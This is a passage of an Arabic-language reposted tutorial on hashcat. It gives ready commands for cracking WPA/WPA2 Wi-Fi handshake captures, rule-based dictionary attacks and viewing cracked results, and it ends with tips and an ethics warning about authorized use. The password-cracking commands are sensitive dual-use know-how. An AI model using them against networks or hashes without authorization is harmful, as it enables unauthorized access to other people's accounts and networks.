hccapx (الذي يتم إنشاؤه بواسطة أدوات مثل hcxdumptool ثم تحويله بواسطة hcxpcaptool).

hashcat -m 2500 -a 0 wifi_hashes.hccapx wordlisttxt -o cracked_wifi.txt

* -m 2500: نوع الهاش هو WPA/WPA2.

* wifi_hashes.hccapx: ملف الـ hashes لشبكة Wi-Fi.

4. استخدام هجوم القاعدة مع قاموس:
لنفترض أن لديك قاموسًا وتريد تطبيق قواعد معينة (مثل إضافة "123" في النهاية أو تغيير الحرف الأول إلى كبير).

hashcat -m 0 -a 0 hashes.txt wordlist.txt -r rules/rockyou-30000.rule -o cracked_rules.txt

* -r rules/rockyou-30000.rule: يحدد ملف قواعد لتطبيقه على كل كلمة في القاموس.
Hashcat تأتي مع عدة ملفات قواعد جاهزة في مجلد rules.

5. عرض الـ Hashes المكسورة سابقاً:
hashcat -m 0 hashes.txt --show

* سيقوم هذا الأمر بالبحث في ملف hashcat.potfile (الذي تحتفظ به Hashcat تلقائيًا) وعرض أي كلمات مرور تم تكسيرها سابقًا لنفس نوع الهاش الموجود في hashes.txt.
نصائح هامة عند استخدام Hashcat:

* القوة الحاسوبية: لتحقيق أفضل النتائج، تحتاج Hashcat إلى بطاقة رسوميات (GPU) قوية. كلما كانت بطاقتك أقوى (خاصة من NVIDIA أو AMD)، زادت سرعة التكسير.

* نوع الـ Hash: تأكد دائمًا من معرفة نوع الـ "hash" الصحيح (-m الخيار). إذا كان النوع خاطئًا، فلن تتمكن Hashcat من تكسير أي شيء.

* القواميس والقواعد: جودة القواميس وملفات القواعد تؤثر بشكل كبير على مدى نجاح الهجوم. استخدم قواميس كبيرة وحديثة.

* ملفات الـ Potfile: تحتفظ Hashcat بملف يسمى hashcat.potfile (أو hashcat.pot في الإصدارات القديمة) حيث تخزن كل الـ "hashes" التي تم تكسيرها بنجاح مع كلمات المرور المقابلة لها. لا تحذف هذا الملف، فهو مفيد جدًا.

* الأخلاقيات: استخدام Hashcat لتكسير كلمات المرور دون إذن صريح هو غير قانوني وغير أخلاقي. استخدم هذه الأداة فقط في بيئات مرخصة (مثل اختبار الاختراق القانوني) أو لغرض استعادة كلمات مرورك الخاصة التي فقدتها.

#منقول

Address

Sanaa

Website

https://falnakon.com/users/1131/profile

Alerts

Be the first to know and let us send you an email when م. عمر عبدالعزيز البتراء - Eng. Omar Abdulaziz AL-Btra'a posts news and promotions. Your email address will not be used for any other purpose, and you can unsubscribe at any time.

Contact The Business

Send a message to م. عمر عبدالعزيز البتراء - Eng. Omar Abdulaziz AL-Btra'a:

Share